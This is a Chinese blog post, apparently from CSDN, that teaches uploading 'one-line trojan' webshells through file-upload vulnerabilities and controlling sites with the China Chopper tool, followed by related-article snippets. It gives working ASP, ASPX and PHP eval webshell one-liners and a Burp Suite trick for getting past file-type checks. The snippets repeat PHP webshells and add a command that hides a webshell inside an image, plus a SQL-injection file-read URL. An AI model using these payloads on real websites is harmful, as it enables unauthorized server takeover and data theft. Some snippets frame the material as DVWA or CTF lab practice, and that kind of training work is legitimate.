文件上传一句话木马,用菜刀进行连接

最新推荐文章于 2024-05-17 04:33:47 发布
最新推荐文章于 2024-05-17 04:33:47 发布
阅读量9k 收藏 28
点赞数 3
文章标签: web安全 基础 简单
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XY011009/article/details/103354572
版权

菜刀工具
提取码:tg6t

关于文件上传

文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。

1.无任何上传限制
这里可以直接上传一句话木马然后用菜刀工具进行连接
2.限制了文件类型
有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看看文件的类型是否符合自己的要求,不符合的都会返回给服务器一串拒绝的代码,然后服务器则不会接受这个文件,这种情况就需要使用burpsuit进行拦截,一般拦截下来的信息会有拒绝上传的信息,把拒绝上传的信息删掉在发送回服务器则可以上传成功
3.限制文件的后缀
这个方法更加的暴力,直接限制了文件的后缀,这样网站会有很多限制可是也很有效的对文件上传漏洞有更好的防护

一句话木马

一句话木马就是webshell,就是一串函数生成的后门。
木马分为小马和大马
小马:一句话木马也成为小马,即整个shell代码量只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到

一句话木马针对网站的类型选择,下面是几个网站类型对应的木马

asp一句话

<%eval request ("pass")%>

aspx一句话

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php一句话

php @eval($_POST['pass']);?>

我们吧这些木马写入一个asp/aspx/php文件内,再利用文件上传吧文件上传

比如:

一个网站存在文件上传漏洞,
一个网站的文件上传

把php一句话写入php文件
php一句话木马
上传文件
在这里插入图片描述
上传成功后直接用菜刀连接这个网站的链接,右击文件管理就可以获取整个网站的目录了

XY011009
关注
  • 3
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
WebShell连接工具(中国菜刀WeBaCoo、Weevely)使用
悦分享
07-31 3325
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
ctf中国菜刀连接一句话木马
weixin_41038905的博客
05-06 6772
中国菜刀下载地址,试了好几个版本的就这个好用: https://pan.baidu.com/share/link?shareid=871753024&uk=388464620 上传一句话木马: <?php @eval($_POST['hacker'])?> 将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php 通过菜刀连接: 在空白位置右键-》添加 ...
Web安全-一句话木马
liuwei0376的专栏
08-20 4020
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
Pikachu靶场——文件上传漏洞_pikachu文件上传漏洞
2401_84545862的博客
05-17 797
我们在这里查看浏览按钮,可以看出这里有一个对应的判断,当input标签去onchange,发生改变的时候,他就回去调用checkFileExt,我们可以把checkFileExt函数删掉,这和我们之前XSS漏洞的时候修改限制字数一样。这个PHP文件上传成功后,就和前面的一样,我们可以通过访问这个PHP文件,传参,通过一句话木马来控制服务器。,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
菜刀连接图片一句话木马
热门推荐
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
一句话木马菜刀使用
weixin_33720078的博客
08-19 920
来一波原理: eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false <?php @eval($_POST(‘1’);?> 各种绕过文件上传的姿势:https://b...
dvwa之 file upload (low)一句话木马和中国菜刀
crowsec
04-28 4305
low等级的可以使用一句话木马和中国菜刀低等级的没有对于上传做任何的过滤或者是防护,所以直接用一句话木马进行上传即可(相关原理可以参照其他大佬的)首先直接用一个txt里面构造一句话木马即可:(php):&lt;?php @eval($_POST['pass']);?&gt;直接命名为pass.php即可(只是针对low等级),然后上传上传成功,路径如下:../../hackable/uploads...
菜刀 下载链接
blrk
02-04 1851
http://www.st999.cn/blog/?action=show&id=144 http://www.hacknote.com/read/736.html
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
最后,使用中国菜刀对当前一句话木马进行连接。 三、PHP一句话木马写入数据库或者网页文件的方式 一句话木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D...
28.文件上传漏洞和Caidao入门及防御原理(一)1
08-04
1. 一句话木马原理:一句话木马是指非常简短的恶意脚本,能够在被触发时执行特定的命令。例如,PHP的一句话木马可能是`($_POST['cmd']); ?>"`,当用户提交包含命令的POST参数时,服务器会执行这些命令。 2. 图片一...
PHP实现批量上传单个文件
01-20
很多时候当我们通过某个通用型RCE...当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。 那么,此处的菜刀如何通过简单的一句话就可以实现对服务
WebShell文件上传漏洞分析溯源
02-22
接着,我们上传一句话木马,打开 Burp 拦截得到 cookie 值和上传路径,放行数据上传成功打开菜刀使用 shell 连接进到 html 目录拿到 Key。 这个实践案例演示了如何使用御剑扫描工具来检测Web应用程序的文件上传漏洞...
WebShell文件上传漏洞分析溯源(第3题)
02-22
使用 WinHexlsb_jb51 软件或手动添加一句话木马到 JPG 文件中。例如,我们可以添加以下代码: `($_POST['lxm']);?>` ### 步骤 2:上传文件 打开测试靶场上传页面,上传已经命名的 8.jpg 文件。 ### 步骤 3:拦截...
sql 上传文件 下载文件 一句话木马+菜刀 sqlmap
qq_41071646的博客
02-21 3965
这里说的内容可能比较多  但是都需要  高的权限 能够 创建删除 文件~~~~   然后 先说一下 下载文件吧     我们构造的链接是 http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=0' union select 1,load_file("D:\\flag.txt"),3 --+ 然后  我们的内容 如下  ...
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5579
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
DVWA-文件上传全等级绕过(一句话木马+中国菜刀+蚁剑)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 1万+
DVWA文件上传前言一、low级别1.1 一句话木马1.2 中国菜刀使用1.3 蚁剑二、Medium级别三、High级别四、Impossible级别 前言     文件上传漏洞是对于上传文件的类型内容没有进行严格的过滤检查,使得攻击者可以通过上传一些木马获取服务器的webshell,因此文件上传漏洞带来的危害通常都是致命的。 一、low级别 打开dvwa,File Upload     会看到有红色报错,具体解决办法请参考我的
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1888
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1831
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
自动验证菜刀链接
weixin_30814223的博客
02-13 559
  前两天小组的一个刚毕业的运营小姑娘转正答辩,发现她正在做验证菜刀链接是否有效的人工验证工作,可是这个过程做的是个纯人工的,且不说干的枯燥无味,就是从成本上对于团队,对于公司都是损失的。。想想一个IT公司,一个做技术的团队,为什么不弄个自动化的工具做这个工作呢。虽然我们不是黑客牛人出身,但是可以私下巧妙的借用借用牛人的工具啊^_^。说干就干。小姑娘用的XISE这个工具,百度了一下其实还有其他工具...
写一个文件上传漏洞一句话木马
最新发布
06-19
我不能提供关于创建或利用文件上传漏洞的任何指导,因为这种行为违反了网络安全规定和道德准则,可能导致未经授权的数据访问或系统破坏。安全专家强烈建议避免此类活动,而应该专注于学习并使用技术来保护系统免受攻击。 如果你对网络安全感兴趣,可以探索如何修补这些漏洞(如使用验证、过滤和输入 sanitization 等防御措施),或者学习如何防范和响应这类攻击。对于合法的安全研究,通常需要在受控的环境中,并遵守相关的法律和政策。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值